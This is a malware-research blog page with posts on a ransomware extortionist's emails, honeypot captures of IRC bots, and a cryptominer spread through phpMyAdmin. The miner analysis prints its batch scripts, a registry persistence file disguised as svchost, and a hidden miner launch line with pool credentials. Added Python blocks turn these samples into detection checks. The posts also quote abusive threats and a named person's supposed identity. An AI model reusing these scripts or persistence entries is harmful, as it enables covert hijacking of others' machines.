<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglNLS2rrbE6LcTU6YbYqjJl4TzAwznLPMrJE7Rl_cgjgCyyQBxz4Xctu35khQc6Q9lJahLbQRe4Mns5e_gfKFD1NFE5w33xksjKuGhw6Q9WnP_YiYHfBYoS_hINmEbEgVjw8fzKynty0Q/s1600/zL.png" imageanchor="1" ><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglNLS2rrbE6LcTU6YbYqjJl4TzAwznLPMrJE7Rl_cgjgCyyQBxz4Xctu35khQc6Q9lJahLbQRe4Mns5e_gfKFD1NFE5w33xksjKuGhw6Q9WnP_YiYHfBYoS_hINmEbEgVjw8fzKynty0Q/s320/zL.png" /></a><br />
<br />
So it gives an email address and says to contact him and send him a sum from 100$, then we get our files back.<br />
So I wrote him an email just for fun, and after some conversation I told him I don't know what bitcoin is, I'm just a stupid<br />
user that lost his data and just wants his data back. He responded like this:<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUXnWmef3nOgVzYg81FAllyFpxswozqY2F_E1FDzNQ2eiU1ElUBNZU5Uqc-sXkRBysVNchVjF2bRnwGK85Zm2-KRIGQbSyLXcdy9zkB8VHkRSPSVDCRtx2rim75PyO9Tt0i_LjJa2tCKk/s1600/zI.png" imageanchor="1" ><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUXnWmef3nOgVzYg81FAllyFpxswozqY2F_E1FDzNQ2eiU1ElUBNZU5Uqc-sXkRBysVNchVjF2bRnwGK85Zm2-KRIGQbSyLXcdy9zkB8VHkRSPSVDCRtx2rim75PyO9Tt0i_LjJa2tCKk/s320/zI.png" /></a><br />
<br />
Also an identity of a person; not sure if it's him or, like he said, just a drop, but he also sent me other names.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWCAJzuevNaxRG38byOkoU61DUDLqlrDzG5BvOflA-h1SZ9ZUvFqnWIs2aE_9X2sYepjg1he5A-_9Dyx-GBp-OoshQAnRxz-P4Zs9MoDOWDPsoOyTULPB7BYqmSFb6O5DugFFNo0V-Odc/s1600/zII.png" imageanchor="1" ><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWCAJzuevNaxRG38byOkoU61DUDLqlrDzG5BvOflA-h1SZ9ZUvFqnWIs2aE_9X2sYepjg1he5A-_9Dyx-GBp-OoshQAnRxz-P4Zs9MoDOWDPsoOyTULPB7BYqmSFb6O5DugFFNo0V-Odc/s320/zII.png" /></a><br />
<br />
I almost got him lol, see the following picture..<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6LSO6uyvvjPaypwDvI-FTGRsqPbiJQgjaZmJqpbHJ9RJzy7MUBo5S9_jrOHD6vFveHEAxEhBPe1UZqX2yk0filqEqs0ipN3RVV55BkOrG8VvI1hp-lzIpvTe5o_lC_JuvTLhChv1hUAc/s1600/zAL.png" imageanchor="1" ><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6LSO6uyvvjPaypwDvI-FTGRsqPbiJQgjaZmJqpbHJ9RJzy7MUBo5S9_jrOHD6vFveHEAxEhBPe1UZqX2yk0filqEqs0ipN3RVV55BkOrG8VvI1hp-lzIpvTe5o_lC_JuvTLhChv1hUAc/s320/zAL.png" /></a><br />
<br />
And yeah, this was his last message. PS: lulz at his English.<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">
Bro you seriousl or you malware reserceher?
i give you valid details
My name is Ivan Fedorov
i am in Latvia
You sure you wont myhelp
i am sent you N7 msg
any who REALY need data computer ASK N1 GET BITCOIN
MAKE IN 48 HOURZ
I UZE ZEUS BOTNETZ
ANTI CORUPTIONZ ANTI ILLUMINATI SYSEM
HOW YOU R MOMA DIE SLOW IN HOSPITAL
YOU BE SOME 1 GUY RUS HOW YOU FAGGOT
MAKE PAUZE YOUR SELF!
you're putting spokes in the wheels, I'm for what's normal and I don't touch Russians
your mom feeds you, she'll die soon and then rent, food, utilities etc. will all go up
in short, why the fuck are you messing with my head here, why should I waste my time on you
MAY YOUR MOM DIE
YOUR MOM EAT MY EXE
DON KILUMINATI 7 DAY THEORY
</code></pre>bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com1tag:blogger.com,1999:blog-2580748854525661454.post-45157361547109874982015-02-08T11:44:00.001-08:002015-02-08T11:44:31.665-08:00IRC Botnet - 218.200.153.154 - PWNED<br />I don't know if this kid is just stupid or if he's really trying to dox me;<br />
if so, keep it going lol. Another attack from him on my honeypot:<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicZbfLZpIouBpbJ4I7yFTAwHs49qwmm9lXOD22HbLdjWrbVcd8Kk07n1MtKj0Mmh23CRff1Jel6R7N6mFpjtNT29Aqxlb1MpSH-WoQM2KD3aOBXAYQYz3UxVEL1BUM3NCR3L4XL8Hd1fA/s1600/00.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicZbfLZpIouBpbJ4I7yFTAwHs49qwmm9lXOD22HbLdjWrbVcd8Kk07n1MtKj0Mmh23CRff1Jel6R7N6mFpjtNT29Aqxlb1MpSH-WoQM2KD3aOBXAYQYz3UxVEL1BUM3NCR3L4XL8Hd1fA/s320/00.png" /></a><br />
And again he is using an IRC server for hosting bots.<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZucDRUDbsgvNRercMpqF5F5S0ul75HLikddL30uftn4vHdGQT1RnIdwAYMAugK2p9CARVPbHEazkbkf27CyRhTynxUVuLdUgyMU1irqXjwcKGpUot4Ab6R2TU3aIVEJDHXe-Oh19bEwM/s1600/1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZucDRUDbsgvNRercMpqF5F5S0ul75HLikddL30uftn4vHdGQT1RnIdwAYMAugK2p9CARVPbHEazkbkf27CyRhTynxUVuLdUgyMU1irqXjwcKGpUot4Ab6R2TU3aIVEJDHXe-Oh19bEwM/s320/1.png" /></a><br />
PWNED again.. lolz<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZcfb6M6S3FOxg5XJZuCt0AUEvBvX9WBBVNvm8yw2f_8qcLnzqtuBw8vHbEnzO-Ti8bfJ3yAcWOQyqh0YQv5ERCek4BC3Dl1FG6dDG54OSVhym5SYQYVSOYmySj3td16WEUJoJ2JG7_FU/s1600/99.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZcfb6M6S3FOxg5XJZuCt0AUEvBvX9WBBVNvm8yw2f_8qcLnzqtuBw8vHbEnzO-Ti8bfJ3yAcWOQyqh0YQv5ERCek4BC3Dl1FG6dDG54OSVhym5SYQYVSOYmySj3td16WEUJoJ2JG7_FU/s320/99.png" /></a><br />
bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-46016044350278785032015-02-01T05:18:00.000-08:002015-02-01T05:18:27.882-08:00Bot - botnet1.zapto.org - IRC<br />
dns: botnet1.zapto.org<br />
dns2: nhg24.zapto.org<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">>> PASS NhG
<< NOTICE AUTH :*** eh...
>> NICK Taze{NhG-XP-USA}595632
>> USER 2847 "" "TsGh" :2847
<< 001 Taze{NhG-XP-USA}595632
<< 002 Taze{NhG-XP-USA}595632
<< 003 Taze{NhG-XP-USA}595632
<< 004 Taze{NhG-XP-USA}595632
<< 005 Taze{NhG-XP-USA}595632
<< 005 Taze{NhG-XP-USA}595632
<< 005 Taze{NhG-XP-USA}595632
<< 422 Taze{NhG-XP-USA}595632 :MOTD File is missing
>> JOIN #!Nh!# NhG
>> PING :HTTP1.4
>> PONG :HTTP1.4
</code></pre>
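The handshake above is distinctive: a server PASS, a templated nick, a numeric ident, a keyed JOIN, and the client answering its own PING. As an added example, not from the original post, here is a small scorer over transcripts in the same >> / << notation; the human session is constructed for comparison, and the numeric-ident rule also fires on the pBot handshake shown later on this page.

```python
import re

# Nick template used by the bot above: <family>{<tag>-<os>-<country>}<random digits>,
# e.g. Taze{NhG-XP-USA}595632. A hand-chosen nick almost never looks like this.
NICK_TEMPLATE = re.compile(r"^[A-Za-z]+\{[A-Za-z0-9-]+\}\d{4,}$")


def irc_bot_indicators(transcript):
    """Score one IRC session transcript in the page's ">> client / << server" notation
    and return the bot-like traits found (empty list = nothing suspicious)."""
    findings = []
    client_pings = set()
    for line in transcript:
        if not line.startswith(">> "):
            continue                      # only the client's side is judged
        parts = line[3:].split(" ")
        cmd = parts[0].upper()
        if cmd == "PASS" and len(parts) > 1:
            findings.append("PASS: server password sent (private/bot-only IRCd)")
        elif cmd == "NICK" and len(parts) > 1 and NICK_TEMPLATE.match(parts[1]):
            findings.append(f"NICK: templated bot nick {parts[1]}")
        elif cmd == "USER" and len(parts) > 1 and parts[1].isdigit():
            findings.append(f"USER: generated numeric ident {parts[1]}")
        elif cmd == "JOIN" and len(parts) > 2 and not parts[2].startswith(":"):
            findings.append(f"JOIN: keyed channel {parts[1]}")
        elif cmd == "PING" and len(parts) > 1:
            client_pings.add(parts[1])    # remember tokens the client pinged with
        elif cmd == "PONG" and len(parts) > 1 and parts[1] in client_pings:
            findings.append(f"PONG: client answered its own PING {parts[1]} (keepalive loop)")
    return findings


# Session captured above (botnet1.zapto.org), copied here as the positive sample.
BOT_SESSION = [
    ">> PASS NhG",
    "<< NOTICE AUTH :*** eh...",
    ">> NICK Taze{NhG-XP-USA}595632",
    '>> USER 2847 "" "TsGh" :2847',
    "<< 001 Taze{NhG-XP-USA}595632",
    "<< 422 Taze{NhG-XP-USA}595632 :MOTD File is missing",
    ">> JOIN #!Nh!# NhG",
    ">> PING :HTTP1.4",
    ">> PONG :HTTP1.4",
]

# Constructed benign session: a human client on a public network.
HUMAN_SESSION = [
    ">> NICK alice",
    ">> USER alice 0 * :Alice Example",
    "<< 001 alice :Welcome",
    ">> JOIN #chat",
    "<< PING :irc.example.net",
    ">> PONG :irc.example.net",
]

if __name__ == "__main__":
    for name, session in (("bot", BOT_SESSION), ("human", HUMAN_SESSION)):
        print(name, irc_bot_indicators(session))
```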
<br />
<a href="https://www.virustotal.com/en/file/d934e15afd07c847cce412d3a8d96d6657286c6f809a2d4acf8e46b54d580aee/analysis/1422795081/" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"><img alt="test" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGjDIqIhUe5O4gSb8xmgunDE92zPt6tT3XSYCpc2OStdN6KX9E83l7jf6jvv-O6mBpLrGpd3r8N1yEWkyOAaZ_LW4bFKk58d4mfHruqsBDXP-ptcGKjHU3nY7u6b2MzNQE0Y_qCD477mW3/s250/vt.PNG" /></a><a href="https://malwr.com/analysis/OGVjZTZjNTRjMTQ0NDQ0YzhmNWIxYjAxNTE4MzY3OWM/share/9c8baa8078c449c6ac62a23ae2349cb5"><img alt="https://malwr.com/analysis/OGVjZTZjNTRjMTQ0NDQ0YzhmNWIxYjAxNTE4MzY3OWM/share/9c8baa8078c449c6ac62a23ae2349cb5" border="0" height="30" src="https://malwr.com/static/graphic/malwr.png" width="100" /></a>bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-73997429583145364342015-01-31T12:31:00.003-08:002015-01-31T12:31:26.035-08:00Miner Spreading over Zmeu<br />Infected machine with CPU at 100%; the binary's execution dir was C:\appserv\phpmyadmin\. Following the logs, it got infected through that pma exploit.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAuJPaLYyDSv4RNfD0eOxBsdAb2MMRMHBVw4Vfl4f7BMLAXI276tg3XK3LXjjktWMM9uU2h4tYO-hpVz6N3CrfI8NeCn0Nu_6LeNtxCDwg07a_pqXXTvj96toqLyAt4TzCjOFhgmzT8Mc/s1600/1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAuJPaLYyDSv4RNfD0eOxBsdAb2MMRMHBVw4Vfl4f7BMLAXI276tg3XK3LXjjktWMM9uU2h4tYO-hpVz6N3CrfI8NeCn0Nu_6LeNtxCDwg07a_pqXXTvj96toqLyAt4TzCjOFhgmzT8Mc/s320/1.png" /></a><br />
init.exe - SFX archive that calls another SFX archive called sys.exe<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicXgJ5MVRPC-iigG23_2v5LdwSZ6w_3hlUhzJ3Q9QLE0_0Xk3bTLyrXf785Fj6kpMXlMKgGaSUXZBxMq8w4a_oSTdJdtYuWPw6dOrX8Th_B-LS2Ki9r8LhD0q7JpaoioGS90lrR2JvafU/s1600/2.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicXgJ5MVRPC-iigG23_2v5LdwSZ6w_3hlUhzJ3Q9QLE0_0Xk3bTLyrXf785Fj6kpMXlMKgGaSUXZBxMq8w4a_oSTdJdtYuWPw6dOrX8Th_B-LS2Ki9r8LhD0q7JpaoioGS90lrR2JvafU/s320/2.png" /></a><br />
sys.exe<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBEHQaKAKWxQCGfZmNXv8wJQ5oJDyU2qiRc98Wq5b-0-yt5OHnl7_9IMjiB3qLY89BZUsstI65-vo9fcilFxUcSSdQsQJtS-EhUEUjKZ1-xrIWbnbjiwgmARGaoXFIodTEW6Jr7cTfJBE/s1600/3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBEHQaKAKWxQCGfZmNXv8wJQ5oJDyU2qiRc98Wq5b-0-yt5OHnl7_9IMjiB3qLY89BZUsstI65-vo9fcilFxUcSSdQsQJtS-EhUEUjKZ1-xrIWbnbjiwgmARGaoXFIodTEW6Jr7cTfJBE/s320/3.png" /></a><br />
run.bat<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">@ECHO OFF
START /WAIT /B taskkill /F /IM init.exe > nul
ping -n 3 -w 2 127.0.0.1 > nul
call geox.exe -pula
:end
</code></pre>
geox.exe<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtOMErUB_B_F_uw2NpXW-x_BrHAgz1WguJI_72CH14f7qcCWdKKt9WTOWL4a3Q2XNLg8OHJnp8ZOclx05gMM6Ake4dmalORaVMdMWPLrBhaFg7gWeHCNcvjZH7yUVhU61fmR3IOWumvlk/s1600/4.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtOMErUB_B_F_uw2NpXW-x_BrHAgz1WguJI_72CH14f7qcCWdKKt9WTOWL4a3Q2XNLg8OHJnp8ZOclx05gMM6Ake4dmalORaVMdMWPLrBhaFg7gWeHCNcvjZH7yUVhU61fmR3IOWumvlk/s320/4.png" /></a><br />
run.bat - sets hidden mode on the folders<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">@ECHO OFF
setx GPU_MAX_ALLOC_PERCENT 100
setx GPU_USE_SYNC_OBJECTS 1
START /WAIT /B regedit /s %SystemRoot%\init\spoolv32\reg.reg
START /WAIT /B %SystemRoot%\init\spoolv32\bash
START /WAIT /B regedit /s %SystemRoot%\init\spoolv64\reg.reg
START /WAIT /B %SystemRoot%\init\spoolv64\bash
START attrib +H +S %SystemRoot%\init
</code></pre>
reg.reg - sets itself up as a startup service<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho8VZJ25MlkVRcA8mVU3zZfZ9HhgyvO4U0AK3L6lmO1dfResseVR6cFKYmOAWLRCyediZdFR9KFwBZekZ5b5HKdOhHTTUc3KdzpK_dK3RmMDhkaTuFnSHqQ23OpIecSuooVLCORjydc6w/s1600/6.png" imageanchor="1"> <img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho8VZJ25MlkVRcA8mVU3zZfZ9HhgyvO4U0AK3L6lmO1dfResseVR6cFKYmOAWLRCyediZdFR9KFwBZekZ5b5HKdOhHTTUc3KdzpK_dK3RmMDhkaTuFnSHqQ23OpIecSuooVLCORjydc6w/s320/6.png" /></a><br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]
"Application"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""
"AppDirectory"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"spoolv"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""
</code></pre>
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsi5RRTYsMPncJSoJcVj2AViDPSSzKq_7R7CV2lmU1Ev1mo8yGNny97KSsoaYv0vkWdUeNK0FMAVM0X8Lo1gVwvRL4OAhI8uyhC7qQvkpRPBzScCH15KyhWpZx2xLBJBibArz_FpnpLCs/s1600/7.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsi5RRTYsMPncJSoJcVj2AViDPSSzKq_7R7CV2lmU1Ev1mo8yGNny97KSsoaYv0vkWdUeNK0FMAVM0X8Lo1gVwvRL4OAhI8uyhC7qQvkpRPBzScCH15KyhWpZx2xLBJBibArz_FpnpLCs/s320/7.png" /></a><br />
bash.lnk - also starts the miner with the following command, host, user and pass<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">%SystemRoot%\init\hstart.exe /NOCONSOLE /SILENT /D="%SystemRoot%\init\spoolv32" /HIGH "%SystemRoot%\init\spoolv32\init.exe -o stratum+tcp://stratum.wemineftc.com:80 -O geox.1:x"
</code></pre>
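The reg.reg file and the bash.lnk launch line are the persistence and pool indicators of this miner. As an added example, not from the original post, here is a parser for the .reg file that flags the fake svchost service and the Run entry, and an extractor for the stratum pool and worker from the launch command; the trusted-directory list is an assumption.

```python
import re

# reg.reg dropped by the miner (copied from the post above).
REG_TEXT = r'''Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]
"Application"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""
"AppDirectory"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"spoolv"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""
'''

# Launch line from bash.lnk (copied from the post above).
BASH_LNK_CMD = r'''%SystemRoot%\init\hstart.exe /NOCONSOLE /SILENT /D="%SystemRoot%\init\spoolv32" /HIGH "%SystemRoot%\init\spoolv32\init.exe -o stratum+tcp://stratum.wemineftc.com:80 -O geox.1:x"'''


def unquote_reg(value):
    """Strip the outer quotes of a REG_SZ literal and undo the backslash escaping."""
    value = value.strip()
    if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
        value = value[1:-1]
    out, i = [], 0
    while i < len(value):
        if value[i] == "\\" and i + 1 < len(value):
            out.append(value[i + 1])      # \\ -> \ and \" -> "
            i += 2
        else:
            out.append(value[i])
            i += 1
    return "".join(out)


def parse_reg(text):
    """Minimal .reg parser -> {key: {value name: value}}. "[-KEY]" deletion lines
    are skipped, so only the keys the file (re)creates are returned."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[-"):
            current = None
        elif line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and line.startswith('"') and "=" in line:
            name, _, value = line.partition("=")
            keys[current][name.strip('"')] = unquote_reg(value)
    return keys


AUTOSTART_MARKERS = ("\\currentversion\\run", "\\currentcontrolset\\services\\")
# Assumed list of directories a legitimate autostart target normally lives in.
TRUSTED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\system32\\")


def suspicious_autostarts(keys):
    """Flag autostart values that launch a .lnk or a file outside the trusted
    directories: here a fake 'svchost' service and a Run entry both point at
    bash.lnk under %SystemRoot%\\init."""
    findings = []
    for key, values in keys.items():
        if not any(marker in key.lower() for marker in AUTOSTART_MARKERS):
            continue
        for name, value in values.items():
            target = value.strip('"').lower()
            reasons = []
            if target.endswith(".lnk"):
                reasons.append("shortcut as autostart target")
            if not target.startswith(TRUSTED_DIRS):
                reasons.append("outside trusted program directories")
            if reasons:
                findings.append((key, name, "; ".join(reasons)))
    return findings


STRATUM_RE = re.compile(r'stratum\+tcp://(?P<host>[^:\s"]+):(?P<port>\d+)\s+-O\s+(?P<worker>[^\s"]+)')


def miner_from_cmdline(cmdline):
    """Pull pool host/port and worker credentials out of a miner launch line. The pool
    here is reached on TCP/80, so a port-based egress rule alone would not catch it."""
    m = STRATUM_RE.search(cmdline)
    if not m:
        return None
    user, _, password = m["worker"].partition(":")
    return {"pool": m["host"], "port": int(m["port"]), "user": user, "password": password}


if __name__ == "__main__":
    for finding in suspicious_autostarts(parse_reg(REG_TEXT)):
        print("autostart:", *finding)
    print("miner:", miner_from_cmdline(BASH_LNK_CMD))
```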
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRTHG_C2TmbzHYZkz0yYpU_N-tXJ3Jutl35Tw3P09QiqWqUWBQcdX2jtfGeuR1YG-DF24OqmhIPbpjvBawz0dCNVInh9aZiUmjzyRJFi4ln6USHNG8NUHinJU-X2SwkTh4aubmduxZXVc/s1600/8.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRTHG_C2TmbzHYZkz0yYpU_N-tXJ3Jutl35Tw3P09QiqWqUWBQcdX2jtfGeuR1YG-DF24OqmhIPbpjvBawz0dCNVInh9aZiUmjzyRJFi4ln6USHNG8NUHinJU-X2SwkTh4aubmduxZXVc/s320/8.png" /></a> <br />
init.exe - the miner exe; it also has a help command.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyS2MyuZkfM5NCG4c-1hYhWZsGF6bmVzkeU0wxGrGBDCJIpGKnmhl65xwp79Xtaot1H2Dy_HbeUtbcwKUzhNX74AWOSUBLCMv64x0X68_k9M35nCAX9TQyq394x0QpHbSMEujj0ah1aEs/s1600/9.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyS2MyuZkfM5NCG4c-1hYhWZsGF6bmVzkeU0wxGrGBDCJIpGKnmhl65xwp79Xtaot1H2Dy_HbeUtbcwKUzhNX74AWOSUBLCMv64x0X68_k9M35nCAX9TQyq394x0QpHbSMEujj0ah1aEs/s320/9.png" /></a><br />
<br />
<span style="background-color: #cccccc;"><span style="color: #3d85c6;"><b><a href="https://www.virustotal.com/en/file/a446373de81e554d9077b063e78acf4091396e38cbe055868c6ecae3e116a020/analysis/" target="_blank">VirusTotal</a></b></span></span> - <span style="background-color: #cccccc;"><b><a href="https://malwr.com/analysis/MWZiM2E2MjNmNGFmNGY1MzgyMmNhNGMwOWM3MWVjZWQ/share/f966eed9aca74adeba1cf7ca1b0eca0f" target="_blank">Malwr</a></b></span>bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-65344296318573011212015-01-28T14:09:00.002-08:002015-01-28T14:11:35.112-08:00pBot - 167.114.128.120 - IRC<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXXB8lDTsLIquQ7sgGtfFXnOzN50qGh7ifXN4GyVS6ZoIacKohQHMxaPTErDI-JwhA0vyhjhedD01Wre0aE00fLre42r6J5yL5sl-grpzzmpe2O4TSQnCVDzXuWmltvt04P7Dx0Bf_MYM/s1600/1.png" imageanchor="1"><img alt="Honeypot Logs" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXXB8lDTsLIquQ7sgGtfFXnOzN50qGh7ifXN4GyVS6ZoIacKohQHMxaPTErDI-JwhA0vyhjhedD01Wre0aE00fLre42r6J5yL5sl-grpzzmpe2O4TSQnCVDzXuWmltvt04P7Dx0Bf_MYM/s320/1.png" title="Honeypot Logs" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYh8xY-XLQ5ODWNnJkED0dO-b4IDhbwIA0SqLvW3GhN0sBTNqYjygJkaGSqOsKrFZh-sA46WW7x6DHSMgdvhuapRcyssoUGsmB-K7XQBVz7FVBASnfcEA0Y6ofvtVbzMI6JVSMKzri7Wk/s1600/2.png" imageanchor="1"><img alt="" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYh8xY-XLQ5ODWNnJkED0dO-b4IDhbwIA0SqLvW3GhN0sBTNqYjygJkaGSqOsKrFZh-sA46WW7x6DHSMgdvhuapRcyssoUGsmB-K7XQBVz7FVBASnfcEA0Y6ofvtVbzMI6JVSMKzri7Wk/s320/2.png" title="Nmap Scan " /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX26FbdlYvknA8bDe6Mu15OAkydPD7eI3sG6sECMLJYh6E1sJsOHjowKsHhC1WuoVhwUM1PvY8yDQE50zQcloP35vUKPBU7kHJ_SfWCyF5jtrySGTRVrvZN9-Ij6ruV9yZN-TpeQU63kY/s1600/3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX26FbdlYvknA8bDe6Mu15OAkydPD7eI3sG6sECMLJYh6E1sJsOHjowKsHhC1WuoVhwUM1PvY8yDQE50zQcloP35vUKPBU7kHJ_SfWCyF5jtrySGTRVrvZN9-Ij6ruV9yZN-TpeQU63kY/s320/3.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqPjmpKCuE9bkvnhy1GYUZ3_1Z-V35D2DNe8mlco3KWZ8BAPSFQL7YG-ektpU7S-DGox2NwtaKC8laAMY4JRbNluSwZ4nlaI033MdqBevYQwhwA8j0alEDOa6cdZTGEP9XdNDMcijxxQA/s1600/4.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqPjmpKCuE9bkvnhy1GYUZ3_1Z-V35D2DNe8mlco3KWZ8BAPSFQL7YG-ektpU7S-DGox2NwtaKC8laAMY4JRbNluSwZ4nlaI033MdqBevYQwhwA8j0alEDOa6cdZTGEP9XdNDMcijxxQA/s320/4.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RKKNA1kGhcpDJs435be_XqZpJulPLaek9MNpDX5LXv7izRB8si9mvp4n1NYf5fspcrrG-tD7bnRyGJ2JkMXw6sZlA148kEd3XUwiwmM53M7Vni4cQbCrk6JH7hWgOBXDUSkdUpHRdZA/s1600/5.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RKKNA1kGhcpDJs435be_XqZpJulPLaek9MNpDX5LXv7izRB8si9mvp4n1NYf5fspcrrG-tD7bnRyGJ2JkMXw6sZlA148kEd3XUwiwmM53M7Vni4cQbCrk6JH7hWgOBXDUSkdUpHRdZA/s320/5.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqmTeh1fp7ZezTSe-_IUQ2f1dhC8DOGgOTbULw_sH7hPwuQeb9dwN4_SNiGyK-gvdU6pfNrsqeZinANS7lz22kLcdFDZaeYyF30-QGtO87hLGUmXUtIYOvyqSXyL_aIfqkNsUKU05Ulas/s1600/6.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqmTeh1fp7ZezTSe-_IUQ2f1dhC8DOGgOTbULw_sH7hPwuQeb9dwN4_SNiGyK-gvdU6pfNrsqeZinANS7lz22kLcdFDZaeYyF30-QGtO87hLGUmXUtIYOvyqSXyL_aIfqkNsUKU05Ulas/s320/6.png" /></a><br />
<br />
